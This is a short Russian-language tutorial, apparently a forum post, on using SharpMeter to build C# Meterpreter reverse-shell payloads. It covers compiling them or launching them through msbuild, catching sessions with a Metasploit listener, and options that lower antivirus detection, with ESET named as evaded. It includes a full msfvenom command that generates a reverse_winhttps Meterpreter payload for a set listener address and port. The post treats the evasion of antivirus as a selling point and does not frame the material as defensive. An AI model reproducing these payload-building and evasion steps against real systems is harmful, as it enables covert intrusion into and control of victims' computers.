SharpMeter - генератор полезных нагрузок C-sharp

посмотрим сегодня функционал программы SharpMeter которая позволяет нам создавать полезные нагрузки на языке C#. Написанная на питоне. Все тривиально просто. И так качнули с гитхаба. Запустили на виндоус машине,смотрим справку:
1.PNG
Поддерживает наш скрипт два режима генерации полезной нагрузки:
Путем ввода айпи и порта атакуещего + опции
Путем добавления хекс кода + опции
И так давайте сначала первый простой метод путем создания без либо каких опций:
2.PNG 3.PNG

Видите он как и мой скрипт создает список команд для метасплоита и команду компиляции через NET Framework.
Поднимем листенер,выполним команду для компиляции: 3.PNG 5.PNG 6.PNG
Запускаем - получаем сессию 9.PNG

Что касается детекта на АВ. Вот результаты :
7.PNG
Из известных АВ детектится Есетом.

Ну не FUD но тоже не плохо довольно) Если использовать с параметрами -w -x , то детект будет 7/41 но ЕСЕТ не будет палит и другие известные АВ также
Вот результат бинарника созданно с этими параметрами.
Дальше пробуем тоже самое только с дополнительными опциями: 10.PNG
Получили команду для msbuild.
Запускаем и прилетает сессия без компиляции в бинарный файл.
Ну и второй способ довольно интересный)))
Создаем полезную нагрузку через msfvenom сначала командой:

Код (Text):

msfvenom -p windows/meterpreter/reverse_winhttps lhost=192.168.137.92 lport=1337 -f hex

11.PNG

Копипастим сроку в хексе в наш параметр для SharpMeter:
11-1.PNG

Запускаем команду msbuild - получаем сессию)

12.PNG
Все довольно просто и удобноhttps://www.youtube.com/watch?v=iUcAWaRcHsk